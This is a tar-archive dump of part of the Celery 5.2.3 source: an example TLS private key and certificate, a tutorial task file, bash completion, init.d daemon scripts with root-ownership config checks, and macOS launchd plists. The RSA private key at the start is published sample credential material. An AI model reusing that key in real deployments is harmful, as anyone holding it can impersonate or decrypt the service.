FqMm5Ek+OFyJ1kDuhdZCrSw2ty/dIZKSt3I0MeAAW0UatXzDu720skuSmnlha/6h z8HuyLq8yFAtCAdhV5s82ITJtssSD6QV4ucV3N07hXcFy/2bZDlx/P4MEZtmwZhG HxEkRx6zvOd8q5Ap1Ly1YaJevQuxMq/42JIbtZxXeC041krZeBo9+Xq1w2/g0k0b zSZm9NJmgD2D3b2eJbDkn8vvrLfsH/E+pY+fItwW60njSkYfcHxMuxdmQmp3Fu4G A4weN9NGuBj1sH+xTJsXysqzeyg5jOKr8oSeV6ZCHpJpMtiHlmE+oEeD0EWG4eZN 88eMfm2nXimxxGoi6wDsFIZDHwgdrpVn/IW2TKn5qP/WxnqXiFvuHobX7qSTcVi8 qKKNIBLUk69gdEPtKSuIRzFH2BHT1WzNk4ITQFecNFI+U/FU76aTdVZfEg018SBx Kj9QCVTgb/Zwc8qp9fnryEJABXD9z4A6F+x6BZSD4B4N2y7a+9p4BAX6/8hnmN4V vjdzAKb0JktYhDl3n15KNBTi6Dx5tednm40k0SmCJGsJ7p0cyFvDnb3n5BB7VXE8 fDQ9q+v8tdsWu4zpxev8aTv+pmSLb3HjAnze7/OyyGko+57cEQKCAQEA6+gGQG2f mGRCFOjY+PrmKDvPIFrbBXvL1LLrjv7danG763c75VdeDcueqBbVei69+xMezhRO sSwrGcO1tHuTgWVwrypkupPdIe56/5sUixEgd9pNhwqiUY0UWLsX0ituX2E/+eCT +HUiSFZkIDOcjHVRF7BLGDN/yGlInPk+BQJHfHSiZOOPn3yJR8jC9IqX0Cl7vi+V 64H9LzqEj82BbQI6vG+uSUs2MIgE09atKXw3p6YRn3udAJcMrOueYgpGEpFN2FOf RYD8EJcKhdx3re3pU5M03cpouwpElgBg16crwNEUmdQhxtLNERACzEHl/Cp6GPB0 6SG+U5qk+R+J/QKCAQEAwUC/0CCdo/OoX236C4BN4SwFNd05dazAK8D2gsf8jpwK 5RgmxzYO9T+sTO6luGt6ByrfPk452fEHa833LbT2Uez1MBC54UoZPRW6rY+9idNr 69VXzenphvp1Eiejo+UeRgsgtHq4s5/421g/C6t6YpNk2dqo3s+Ity84pGAUQWXB 
nv/3KXJ4SfuVBiZPr2b5xWfVIvdLJ4DNiYo28pbuZhBU9iAEjXZcp8ZvVKKU7Etm RvNsqedR84fvPKzHy0uzHZDBSWgDGtt43t+7owdpm2DUag4zrWYEVxFD/G2vGVvC ewprlBs/V2LX7mwIr3O5KchYRWGDr+Osfb+R+EHmVQKCAQB3KwRNc5MVVkATc/R3 AbdWR7A/9eWCBaFX1vIrkA+lf8KgFeFJ3zKB4YRKAQ7h487QkD4VeCiwU1GKeFTH 0U0YJngf5Fhx79PbGi9EA8EC5ynxoXNcbkDE1XGbyRclcg8VW3kH7yyQbAtfY1S8 95VzVqgaQVIN7aX1RUoLEdUEjrwx4HFQaavZsv1eJ8pj4ccCvpHl5v/isg2F2Bey 1Os2d9PX8Mqn97huF6foox9iP3+VzsxENht/es5KY9PkTrBLHN+oEcX5REkQ0Fve dxp14CLntwsTpvX01iEDbTl+dtIhWvz/ICvX1hEFN4NST0+wbHy1MHK+ee89KHeB 6S65AoIBACl/dvEBX/iJ5PkBC7WWiqK0qjXD2IfdXbLHj+fLe/8/oNNLGWCjyhh9 4MjwYiO06JJLcX7Wm3OiX16V7uMgvdgf0xLMNK4dFEhatyh3+lJzVPRibqVn+l6i v6rzWh9intqZnx9CTxE7Y9vuGjOuUeyDDB//5U1bMVdsy3P4scDNUgOLoY6D5zKz 1G9qoKfgq/fo8Qq+IaRM81X6mQwEvxKppSTpATFDXmgko1mARAxtsHvB3+6oHp/1 67iSvaB5E/BgWjEiJbCJum3Zi1hZyiK0a0iO3if5BSuRKJE3GGeQnbWAKlO2eiaQ sh+fkUnjxrojLFlRtE57zFmAXp75v7UCggEAFkXtS94e9RTNaGa0p6qVYjYvf6Yu gze9bI/04PYs1LGVVhnt2V2I2yhgEJhFTMjysSQwbaLHN/RzorhtLfEyoOp3GrnX ojuSONbBIdGquKf4Zj+KaNOqBHeiPlNzRZR4rYz2shkoG4RIf2HeLltIM9oHjETo U/hahPL+nHLEYmB3cbq6fiYlz3lwcszB9S8ubm9EiepdVSzmwsM617m2rrShOMgh 6wB4NQmm9aSZ6McsGbojZLnbFp/WrbP76Nlh7kyu1KKGsPBlKRiWqYVS/QUTvgy4 QsAFLmb7afYAGHwOj+KDCIQeR/tzDLOu8WC4Z4l30wfFvHxsxFiJLYw1kg== -----END RSA PRIVATE KEY----- ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/security/ssl/worker.pem0000664000175000017500000000360300000000000021201 0ustar00asifasif00000000000000-----BEGIN CERTIFICATE----- MIIFYDCCA0igAwIBAgIJALjIfmbgNR83MA0GCSqGSIb3DQEBCwUAMEUxCzAJBgNV BAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEwHwYDVQQKDBhJbnRlcm5ldCBX aWRnaXRzIFB0eSBMdGQwHhcNMTgxMDAyMTYwMTQ2WhcNMTkxMDAyMTYwMTQ2WjBF MQswCQYDVQQGEwJBVTETMBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwYSW50 ZXJuZXQgV2lkZ2l0cyBQdHkgTHRkMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC CgKCAgEAshWXegn+JRX62T73jqFBVtugVWkqT+IGfEQXrL9Tz+sxDVxof4PDeD7L a0lXEppVEqBpR9maR/1CZAmKLmh6snpTC44JXJIRt7suWRQIuy/7f6TDOuh3NtGo HpNuUj4dBkhNNKfHJe9A9LLKjSHplpBZyDwJzqWX8Y1pky8fJTMIuuR6zZs8YR9h Xi0/XyntS/We9XQRUCMpO85VVsVx/KGcYsTzD8ph/YG9HSriKKOvSfqtmef9Lzt2 Psn6BnMk13H0UgrD8RGwv8cIVs4rMOYYnUfGe0p6nsnHCQIOOJBK58+HQJRtLNao I5foSrlU74JzNIyImX/8ED33e1g9JerNVNpMeONvajdfxsn4Dl9haZcharwZKoL5 o1RO8skDMZwV3VdlQT9908q2a40y7BfKRH3duvD7lexTUacyreakL73+24FFFnMC NrpRb58VaqmQASCGpfVv7RGLK3dxqKKpayL4ALdUXSlzZpXJ0nlyaA/A68DbYmVo oHHDwVLxxaA3MMOxIPYlOP/tHbh7hD+S+DE9+cFd/XEFejlUoUWEWiSnzecSfg+9 WvUokUCzn0A/eWBYgB2cSNY2Rq0IqqjN/LpMlkwn377/4VmsB7fFrmj9WEftKr4L Q8AHW/ryMRl1L0NrgOX7yfeyyze1T9nWE+I5pNsAY0ZKlS6vHwECAwEAAaNTMFEw HQYDVR0OBBYEFFJmMBkSiBMuVzuG/dUc6cWYNATuMB8GA1UdIwQYMBaAFFJmMBkS iBMuVzuG/dUc6cWYNATuMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQELBQAD ggIBAGFuEmA0IhOi9eLl4Az1L4GOPgk67k5P/bViOeC5Q96YGU6kqVp/FPCQg8Pt 0vcj6NBhTD+aifT4IaSbCClCDbwuuC/cit67JUxsEdJmSlpEqeccD6OhMmpcpc63 NrFlPpE61Hy3TbUld1hDbhfaAnyFOJFZHWI1fOlrzRu1Rph9TEdSDSJFQQm8NQjX VWBQrBV/tolMVGAkaeYtVBSmdRj4T6QcAaCWzSJe2VjyE7QDi+SafKvc4DOIlDmF 66//dN6oBe0xFEZ1Ng0vgC4Y/CbTqMJEQQi9+HBkbL25gKMz70K1aBBKFDRq3ohF Ltw0Sylp2gY6/MO+B1TsP7sa1E/GECz570sZW22yZuGpZw7zEf1wzuGOaDvD1jct R5R1OAlCapmyeGOziKAfgF1V4BBKnI6q8L1//iuIssgjXvEXNeVpVnqk8IqCxwRP H/VDV6hh51VVuIpksogjpJ5BAsR7/dqFDwJ+nzbTFXQYRlZfgBn89d+7YV1h6SnU RmjcaNABfqmcRsPmEvGsf0UhkB3il0EIOz1KA5o9t8YcgNmzU/s0X9jFwGLp4CI5 z6WGY9P472uHqQeZJv2D8x45Qg6bRmJKTWZ0Yq5ewMeUxyALczJ4fCMr1ufhWrAz /1csxJCTgohGqKecHzVTk7nVz2pCX5eRt80AeFjPvOh3vTn3 -----END CERTIFICATE----- ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.7277553 
celery-5.2.3/examples/tutorial/0000775000175000017500000000000000000000000016356 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/examples/tutorial/tasks.py0000664000175000017500000000023600000000000020056 0ustar00asifasif00000000000000from celery import Celery app = Celery('tasks', broker='amqp://') @app.task() def add(x, y): return x + y if __name__ == '__main__': app.start() ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.3237484 celery-5.2.3/extra/0000775000175000017500000000000000000000000014020 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.7277553 celery-5.2.3/extra/bash-completion/0000775000175000017500000000000000000000000017104 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/extra/bash-completion/celery.bash0000664000175000017500000000117400000000000021231 0ustar00asifasif00000000000000_celery_completion() { local IFS=$' ' COMPREPLY=( $( env COMP_WORDS="${COMP_WORDS[*]}" \ COMP_CWORD=$COMP_CWORD \ _CELERY_COMPLETE=complete $1 ) ) return 0 } _celery_completionetup() { local COMPLETION_OPTIONS="" local BASH_VERSION_ARR=(${BASH_VERSION//./ }) # Only BASH version 4.4 and later have the nosort option. if [ ${BASH_VERSION_ARR[0]} -gt 4 ] || ([ ${BASH_VERSION_ARR[0]} -eq 4 ] && [ ${BASH_VERSION_ARR[1]} -ge 4 ]); then COMPLETION_OPTIONS="-o nosort" fi complete $COMPLETION_OPTIONS -F _celery_completion celery } _celery_completionetup; ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.7277553 celery-5.2.3/extra/generic-init.d/0000775000175000017500000000000000000000000016617 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/extra/generic-init.d/celerybeat0000775000175000017500000002156100000000000020671 0ustar00asifasif00000000000000#!/bin/sh -e # ========================================================= # celerybeat - Starts the Celery periodic task scheduler. # ========================================================= # # :Usage: /etc/init.d/celerybeat {start|stop|force-reload|restart|try-restart|status} # :Configuration file: /etc/default/celerybeat or /etc/default/celeryd # # See http://docs.celeryproject.org/en/latest/userguide/daemonizing.html#generic-init-scripts ### BEGIN INIT INFO # Provides: celerybeat # Required-Start: $network $local_fs $remote_fs # Required-Stop: $network $local_fs $remote_fs # Default-Start: 2 3 4 5 # Default-Stop: 0 1 6 # Short-Description: celery periodic task scheduler ### END INIT INFO # Cannot use set -e/bash -e since the kill -0 command will abort # abnormally in the absence of a valid process ID. #set -e VERSION=10.1 echo "celery init v${VERSION}." if [ $(id -u) -ne 0 ]; then echo "Error: This program can only be used by the root user." echo " Unprivileged users must use 'celery beat --detach'" exit 1 fi origin_is_runlevel_dir () { set +e dirname $0 | grep -q "/etc/rc.\.d" echo $? } # Can be a runlevel symlink (e.g., S02celeryd) if [ $(origin_is_runlevel_dir) -eq 0 ]; then SCRIPT_FILE=$(readlink "$0") else SCRIPT_FILE="$0" fi SCRIPT_NAME="$(basename "$SCRIPT_FILE")" # /etc/init.d/celerybeat: start and stop the celery periodic task scheduler daemon. 
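# Illustrative sketch (not part of the original script): a minimal
# /etc/default/celerybeat configuration file read by this script could look
# like the following. Every variable shown is optional and the values are
# placeholders; only variables actually consumed by this script are listed.
#
#   CELERY_BIN="/usr/local/bin/celery"
#   CELERY_APP="proj"
#   CELERYBEAT_CHDIR="/opt/proj"
#   CELERYBEAT_OPTS="--schedule=/var/run/celery/celerybeat-schedule"
#   CELERYBEAT_USER="celery"
#   CELERYBEAT_LOG_LEVEL="INFO"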
# Make sure executable configuration script is owned by root _config_sanity() { local path="$1" local owner=$(ls -ld "$path" | awk '{print $3}') local iwgrp=$(ls -ld "$path" | cut -b 6) local iwoth=$(ls -ld "$path" | cut -b 9) if [ "$(id -u $owner)" != "0" ]; then echo "Error: Config script '$path' must be owned by root!" echo echo "Resolution:" echo "Review the file carefully, and make sure it hasn't been " echo "modified with mailicious intent. When sure the " echo "script is safe to execute with superuser privileges " echo "you can change ownership of the script:" echo " $ sudo chown root '$path'" exit 1 fi if [ "$iwoth" != "-" ]; then # S_IWOTH echo "Error: Config script '$path' cannot be writable by others!" echo echo "Resolution:" echo "Review the file carefully, and make sure it hasn't been " echo "modified with malicious intent. When sure the " echo "script is safe to execute with superuser privileges " echo "you can change the scripts permissions:" echo " $ sudo chmod 640 '$path'" exit 1 fi if [ "$iwgrp" != "-" ]; then # S_IWGRP echo "Error: Config script '$path' cannot be writable by group!" echo echo "Resolution:" echo "Review the file carefully, and make sure it hasn't been " echo "modified with malicious intent. When sure the " echo "script is safe to execute with superuser privileges " echo "you can change the scripts permissions:" echo " $ sudo chmod 640 '$path'" exit 1 fi } scripts="" if test -f /etc/default/celeryd; then scripts="/etc/default/celeryd" _config_sanity /etc/default/celeryd . /etc/default/celeryd fi EXTRA_CONFIG="/etc/default/${SCRIPT_NAME}" if test -f "$EXTRA_CONFIG"; then scripts="$scripts, $EXTRA_CONFIG" _config_sanity "$EXTRA_CONFIG" . "$EXTRA_CONFIG" fi echo "Using configuration: $scripts" CELERY_BIN=${CELERY_BIN:-"celery"} DEFAULT_USER="celery" DEFAULT_PID_FILE="/var/run/celery/beat.pid" DEFAULT_LOG_FILE="/var/log/celery/beat.log" DEFAULT_LOG_LEVEL="INFO" DEFAULT_CELERYBEAT="$CELERY_BIN" CELERYBEAT=${CELERYBEAT:-$DEFAULT_CELERYBEAT} CELERYBEAT_LOG_LEVEL=${CELERYBEAT_LOG_LEVEL:-${CELERYBEAT_LOGLEVEL:-$DEFAULT_LOG_LEVEL}} CELERYBEAT_SU=${CELERYBEAT_SU:-"su"} CELERYBEAT_SU_ARGS=${CELERYBEAT_SU_ARGS:-""} # Sets --app argument for CELERY_BIN CELERY_APP_ARG="" if [ ! -z "$CELERY_APP" ]; then CELERY_APP_ARG="--app=$CELERY_APP" fi CELERYBEAT_USER=${CELERYBEAT_USER:-${CELERYD_USER:-$DEFAULT_USER}} # Set CELERY_CREATE_DIRS to always create log/pid dirs. CELERY_CREATE_DIRS=${CELERY_CREATE_DIRS:-0} CELERY_CREATE_RUNDIR=$CELERY_CREATE_DIRS CELERY_CREATE_LOGDIR=$CELERY_CREATE_DIRS if [ -z "$CELERYBEAT_PID_FILE" ]; then CELERYBEAT_PID_FILE="$DEFAULT_PID_FILE" CELERY_CREATE_RUNDIR=1 fi if [ -z "$CELERYBEAT_LOG_FILE" ]; then CELERYBEAT_LOG_FILE="$DEFAULT_LOG_FILE" CELERY_CREATE_LOGDIR=1 fi export CELERY_LOADER if [ -n "$2" ]; then CELERYBEAT_OPTS="$CELERYBEAT_OPTS $2" fi CELERYBEAT_LOG_DIR=`dirname $CELERYBEAT_LOG_FILE` CELERYBEAT_PID_DIR=`dirname $CELERYBEAT_PID_FILE` # Extra start-stop-daemon options, like user/group. CELERYBEAT_CHDIR=${CELERYBEAT_CHDIR:-$CELERYD_CHDIR} if [ -n "$CELERYBEAT_CHDIR" ]; then DAEMON_OPTS="$DAEMON_OPTS --workdir=$CELERYBEAT_CHDIR" fi export PATH="${PATH:+$PATH:}/usr/sbin:/sbin" check_dev_null() { if [ ! -c /dev/null ]; then echo "/dev/null is not a character device!" exit 75 # EX_TEMPFAIL fi } maybe_die() { if [ $? -ne 0 ]; then echo "Exiting: $*" exit 77 # EX_NOPERM fi } create_default_dir() { if [ ! 
-d "$1" ]; then echo "- Creating default directory: '$1'" mkdir -p "$1" maybe_die "Couldn't create directory $1" echo "- Changing permissions of '$1' to 02755" chmod 02755 "$1" maybe_die "Couldn't change permissions for $1" if [ -n "$CELERYBEAT_USER" ]; then echo "- Changing owner of '$1' to '$CELERYBEAT_USER'" chown "$CELERYBEAT_USER" "$1" maybe_die "Couldn't change owner of $1" fi if [ -n "$CELERYBEAT_GROUP" ]; then echo "- Changing group of '$1' to '$CELERYBEAT_GROUP'" chgrp "$CELERYBEAT_GROUP" "$1" maybe_die "Couldn't change group of $1" fi fi } check_paths() { if [ $CELERY_CREATE_LOGDIR -eq 1 ]; then create_default_dir "$CELERYBEAT_LOG_DIR" fi if [ $CELERY_CREATE_RUNDIR -eq 1 ]; then create_default_dir "$CELERYBEAT_PID_DIR" fi } create_paths () { create_default_dir "$CELERYBEAT_LOG_DIR" create_default_dir "$CELERYBEAT_PID_DIR" } is_running() { pid=$1 ps $pid > /dev/null 2>&1 } wait_pid () { pid=$1 forever=1 i=0 while [ $forever -gt 0 ]; do if ! is_running $pid; then echo "OK" forever=0 else kill -TERM "$pid" i=$((i + 1)) if [ $i -gt 60 ]; then echo "ERROR" echo "Timed out while stopping (30s)" forever=0 else sleep 0.5 fi fi done } stop_beat () { echo -n "Stopping ${SCRIPT_NAME}... " if [ -f "$CELERYBEAT_PID_FILE" ]; then wait_pid $(cat "$CELERYBEAT_PID_FILE") else echo "NOT RUNNING" fi } _chuid () { ${CELERYBEAT_SU} ${CELERYBEAT_SU_ARGS} \ "$CELERYBEAT_USER" -c "$CELERYBEAT $*" } start_beat () { echo "Starting ${SCRIPT_NAME}..." _chuid $CELERY_APP_ARG $DAEMON_OPTS beat --detach \ --pidfile="$CELERYBEAT_PID_FILE" \ --logfile="$CELERYBEAT_LOG_FILE" \ --loglevel="$CELERYBEAT_LOG_LEVEL" \ $CELERYBEAT_OPTS } check_status () { local failed= local pid_file=$CELERYBEAT_PID_FILE if [ ! -e $pid_file ]; then echo "${SCRIPT_NAME} is down: no pid file found" failed=true elif [ ! -r $pid_file ]; then echo "${SCRIPT_NAME} is in unknown state, user cannot read pid file." failed=true else local pid=`cat "$pid_file"` local cleaned_pid=`echo "$pid" | sed -e 's/[^0-9]//g'` if [ -z "$pid" ] || [ "$cleaned_pid" != "$pid" ]; then echo "${SCRIPT_NAME}: bad pid file ($pid_file)" failed=true else local failed= kill -0 $pid 2> /dev/null || failed=true if [ "$failed" ]; then echo "${SCRIPT_NAME} (pid $pid) is down, but pid file exists!" failed=true else echo "${SCRIPT_NAME} (pid $pid) is up..." fi fi fi [ "$failed" ] && exit 1 || exit 0 } case "$1" in start) check_dev_null check_paths start_beat ;; stop) check_paths stop_beat ;; reload|force-reload) echo "Use start+stop" ;; status) check_status ;; restart) echo "Restarting celery periodic task scheduler" check_paths stop_beat && check_dev_null && start_beat ;; create-paths) check_dev_null create_paths ;; check-paths) check_dev_null check_paths ;; *) echo "Usage: /etc/init.d/${SCRIPT_NAME} {start|stop|restart|create-paths|status}" exit 64 # EX_USAGE ;; esac exit 0 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/extra/generic-init.d/celeryd0000775000175000017500000002510300000000000020175 0ustar00asifasif00000000000000#!/bin/sh -e # ============================================ # celeryd - Starts the Celery worker daemon. 
# ============================================ # # :Usage: /etc/init.d/celeryd {start|stop|force-reload|restart|try-restart|status} # :Configuration file: /etc/default/celeryd (or /usr/local/etc/celeryd on BSD) # # See http://docs.celeryproject.org/en/latest/userguide/daemonizing.html#generic-init-scripts ### BEGIN INIT INFO # Provides: celeryd # Required-Start: $network $local_fs $remote_fs # Required-Stop: $network $local_fs $remote_fs # Default-Start: 2 3 4 5 # Default-Stop: 0 1 6 # Short-Description: celery task worker daemon ### END INIT INFO # # # To implement separate init-scripts, copy this script and give it a different # name. That is, if your new application named "little-worker" needs an init, # you should use: # # cp /etc/init.d/celeryd /etc/init.d/little-worker # # You can then configure this by manipulating /etc/default/little-worker. # VERSION=10.1 echo "celery init v${VERSION}." if [ $(id -u) -ne 0 ]; then echo "Error: This program can only be used by the root user." echo " Unprivileged users must use the 'celery multi' utility, " echo " or 'celery worker --detach'." exit 1 fi origin_is_runlevel_dir () { set +e dirname $0 | grep -q "/etc/rc.\.d" echo $? } # Can be a runlevel symlink (e.g., S02celeryd) if [ $(origin_is_runlevel_dir) -eq 0 ]; then SCRIPT_FILE=$(readlink "$0") else SCRIPT_FILE="$0" fi SCRIPT_NAME="$(basename "$SCRIPT_FILE")" DEFAULT_USER="celery" DEFAULT_PID_FILE="/var/run/celery/%n.pid" DEFAULT_LOG_FILE="/var/log/celery/%n%I.log" DEFAULT_LOG_LEVEL="INFO" DEFAULT_NODES="celery" DEFAULT_CELERYD="-m celery worker --detach" if [ -d "/etc/default" ]; then CELERY_CONFIG_DIR="/etc/default" else CELERY_CONFIG_DIR="/usr/local/etc" fi CELERY_DEFAULTS=${CELERY_DEFAULTS:-"$CELERY_CONFIG_DIR/${SCRIPT_NAME}"} # Make sure executable configuration script is owned by root _config_sanity() { local path="$1" local owner=$(ls -ld "$path" | awk '{print $3}') local iwgrp=$(ls -ld "$path" | cut -b 6) local iwoth=$(ls -ld "$path" | cut -b 9) if [ "$(id -u $owner)" != "0" ]; then echo "Error: Config script '$path' must be owned by root!" echo echo "Resolution:" echo "Review the file carefully, and make sure it hasn't been " echo "modified with mailicious intent. When sure the " echo "script is safe to execute with superuser privileges " echo "you can change ownership of the script:" echo " $ sudo chown root '$path'" exit 1 fi if [ "$iwoth" != "-" ]; then # S_IWOTH echo "Error: Config script '$path' cannot be writable by others!" echo echo "Resolution:" echo "Review the file carefully, and make sure it hasn't been " echo "modified with malicious intent. When sure the " echo "script is safe to execute with superuser privileges " echo "you can change the scripts permissions:" echo " $ sudo chmod 640 '$path'" exit 1 fi if [ "$iwgrp" != "-" ]; then # S_IWGRP echo "Error: Config script '$path' cannot be writable by group!" echo echo "Resolution:" echo "Review the file carefully, and make sure it hasn't been " echo "modified with malicious intent. When sure the " echo "script is safe to execute with superuser privileges " echo "you can change the scripts permissions:" echo " $ sudo chmod 640 '$path'" exit 1 fi } if [ -f "$CELERY_DEFAULTS" ]; then _config_sanity "$CELERY_DEFAULTS" echo "Using config script: $CELERY_DEFAULTS" . "$CELERY_DEFAULTS" fi # Sets --app argument for CELERY_BIN CELERY_APP_ARG="" if [ ! 
-z "$CELERY_APP" ]; then CELERY_APP_ARG="--app=$CELERY_APP" fi # Options to su # can be used to enable login shell (CELERYD_SU_ARGS="-l"), # or even to use start-stop-daemon instead of su. CELERYD_SU=${CELERY_SU:-"su"} CELERYD_SU_ARGS=${CELERYD_SU_ARGS:-""} CELERYD_USER=${CELERYD_USER:-$DEFAULT_USER} # Set CELERY_CREATE_DIRS to always create log/pid dirs. CELERY_CREATE_DIRS=${CELERY_CREATE_DIRS:-0} CELERY_CREATE_RUNDIR=$CELERY_CREATE_DIRS CELERY_CREATE_LOGDIR=$CELERY_CREATE_DIRS if [ -z "$CELERYD_PID_FILE" ]; then CELERYD_PID_FILE="$DEFAULT_PID_FILE" CELERY_CREATE_RUNDIR=1 fi if [ -z "$CELERYD_LOG_FILE" ]; then CELERYD_LOG_FILE="$DEFAULT_LOG_FILE" CELERY_CREATE_LOGDIR=1 fi CELERYD_LOG_LEVEL=${CELERYD_LOG_LEVEL:-${CELERYD_LOGLEVEL:-$DEFAULT_LOG_LEVEL}} CELERY_BIN=${CELERY_BIN:-"celery"} CELERYD_MULTI=${CELERYD_MULTI:-"$CELERY_BIN multi"} CELERYD_NODES=${CELERYD_NODES:-$DEFAULT_NODES} export CELERY_LOADER if [ -n "$2" ]; then CELERYD_OPTS="$CELERYD_OPTS $2" fi CELERYD_LOG_DIR=`dirname $CELERYD_LOG_FILE` CELERYD_PID_DIR=`dirname $CELERYD_PID_FILE` # Extra start-stop-daemon options, like user/group. if [ -n "$CELERYD_CHDIR" ]; then DAEMON_OPTS="$DAEMON_OPTS --workdir=$CELERYD_CHDIR" fi check_dev_null() { if [ ! -c /dev/null ]; then echo "/dev/null is not a character device!" exit 75 # EX_TEMPFAIL fi } maybe_die() { if [ $? -ne 0 ]; then echo "Exiting: $* (errno $?)" exit 77 # EX_NOPERM fi } create_default_dir() { if [ ! -d "$1" ]; then echo "- Creating default directory: '$1'" mkdir -p "$1" maybe_die "Couldn't create directory $1" echo "- Changing permissions of '$1' to 02755" chmod 02755 "$1" maybe_die "Couldn't change permissions for $1" if [ -n "$CELERYD_USER" ]; then echo "- Changing owner of '$1' to '$CELERYD_USER'" chown "$CELERYD_USER" "$1" maybe_die "Couldn't change owner of $1" fi if [ -n "$CELERYD_GROUP" ]; then echo "- Changing group of '$1' to '$CELERYD_GROUP'" chgrp "$CELERYD_GROUP" "$1" maybe_die "Couldn't change group of $1" fi fi } check_paths() { if [ $CELERY_CREATE_LOGDIR -eq 1 ]; then create_default_dir "$CELERYD_LOG_DIR" fi if [ $CELERY_CREATE_RUNDIR -eq 1 ]; then create_default_dir "$CELERYD_PID_DIR" fi } create_paths() { create_default_dir "$CELERYD_LOG_DIR" create_default_dir "$CELERYD_PID_DIR" } export PATH="${PATH:+$PATH:}/usr/sbin:/sbin" _get_pidfiles () { # note: multi < 3.1.14 output to stderr, not stdout, hence the redirect. ${CELERYD_MULTI} expand "${CELERYD_PID_FILE}" ${CELERYD_NODES} 2>&1 } _get_pids() { found_pids=0 my_exitcode=0 for pidfile in $(_get_pidfiles); do local pid=`cat "$pidfile"` local cleaned_pid=`echo "$pid" | sed -e 's/[^0-9]//g'` if [ -z "$pid" ] || [ "$cleaned_pid" != "$pid" ]; then echo "bad pid file ($pidfile)" one_failed=true my_exitcode=1 else found_pids=1 echo "$pid" fi if [ $found_pids -eq 0 ]; then echo "${SCRIPT_NAME}: All nodes down" exit $my_exitcode fi done } _chuid () { ${CELERYD_SU} ${CELERYD_SU_ARGS} "$CELERYD_USER" -c "$CELERYD_MULTI $*" } start_workers () { if [ ! 
-z "$CELERYD_ULIMIT" ]; then ulimit $CELERYD_ULIMIT fi _chuid $* start $CELERYD_NODES $DAEMON_OPTS \ --pidfile="$CELERYD_PID_FILE" \ --logfile="$CELERYD_LOG_FILE" \ --loglevel="$CELERYD_LOG_LEVEL" \ $CELERY_APP_ARG \ $CELERYD_OPTS } dryrun () { (C_FAKEFORK=1 start_workers --verbose) } stop_workers () { _chuid stopwait $CELERYD_NODES $DAEMON_OPTS --pidfile="$CELERYD_PID_FILE" } restart_workers () { _chuid restart $CELERYD_NODES $DAEMON_OPTS \ --pidfile="$CELERYD_PID_FILE" \ --logfile="$CELERYD_LOG_FILE" \ --loglevel="$CELERYD_LOG_LEVEL" \ $CELERY_APP_ARG \ $CELERYD_OPTS } kill_workers() { _chuid kill $CELERYD_NODES $DAEMON_OPTS --pidfile="$CELERYD_PID_FILE" } restart_workers_graceful () { echo "WARNING: Use with caution in production" echo "The workers will attempt to restart, but they may not be able to." local worker_pids= worker_pids=`_get_pids` [ "$one_failed" ] && exit 1 for worker_pid in $worker_pids; do local failed= kill -HUP $worker_pid 2> /dev/null || failed=true if [ "$failed" ]; then echo "${SCRIPT_NAME} worker (pid $worker_pid) could not be restarted" one_failed=true else echo "${SCRIPT_NAME} worker (pid $worker_pid) received SIGHUP" fi done [ "$one_failed" ] && exit 1 || exit 0 } check_status () { my_exitcode=0 found_pids=0 local one_failed= for pidfile in $(_get_pidfiles); do if [ ! -r $pidfile ]; then echo "${SCRIPT_NAME} down: no pidfiles found" one_failed=true break fi local node=`basename "$pidfile" .pid` local pid=`cat "$pidfile"` local cleaned_pid=`echo "$pid" | sed -e 's/[^0-9]//g'` if [ -z "$pid" ] || [ "$cleaned_pid" != "$pid" ]; then echo "bad pid file ($pidfile)" one_failed=true else local failed= kill -0 $pid 2> /dev/null || failed=true if [ "$failed" ]; then echo "${SCRIPT_NAME} (node $node) (pid $pid) is down, but pidfile exists!" one_failed=true else echo "${SCRIPT_NAME} (node $node) (pid $pid) is up..." 
fi fi done [ "$one_failed" ] && exit 1 || exit 0 } case "$1" in start) check_dev_null check_paths start_workers ;; stop) check_dev_null check_paths stop_workers ;; reload|force-reload) echo "Use restart" ;; status) check_status ;; restart) check_dev_null check_paths restart_workers ;; graceful) check_dev_null restart_workers_graceful ;; kill) check_dev_null kill_workers ;; dryrun) check_dev_null dryrun ;; try-restart) check_dev_null check_paths restart_workers ;; create-paths) check_dev_null create_paths ;; check-paths) check_dev_null check_paths ;; *) echo "Usage: /etc/init.d/${SCRIPT_NAME} {start|stop|restart|graceful|kill|dryrun|create-paths}" exit 64 # EX_USAGE ;; esac exit 0 ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.7317555 celery-5.2.3/extra/macOS/0000775000175000017500000000000000000000000015022 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/extra/macOS/org.celeryq.beat.plist0000664000175000017500000000135700000000000021251 0ustar00asifasif00000000000000 Disabled GroupName celery-beat KeepAlive Label org.celeryq.beat Program celery ProgramArguments beat --loglevel=WARNING RunAtLoad Umask 7 UserName nobody WorkingDirectory / ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/extra/macOS/org.celeryq.worker.plist0000664000175000017500000000136500000000000021646 0ustar00asifasif00000000000000 Disabled GroupName celery-worker KeepAlive Label org.celeryq.worker Program celery ProgramArguments worker --loglevel=WARNING RunAtLoad Umask 7 UserName nobody WorkingDirectory / ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.7317555 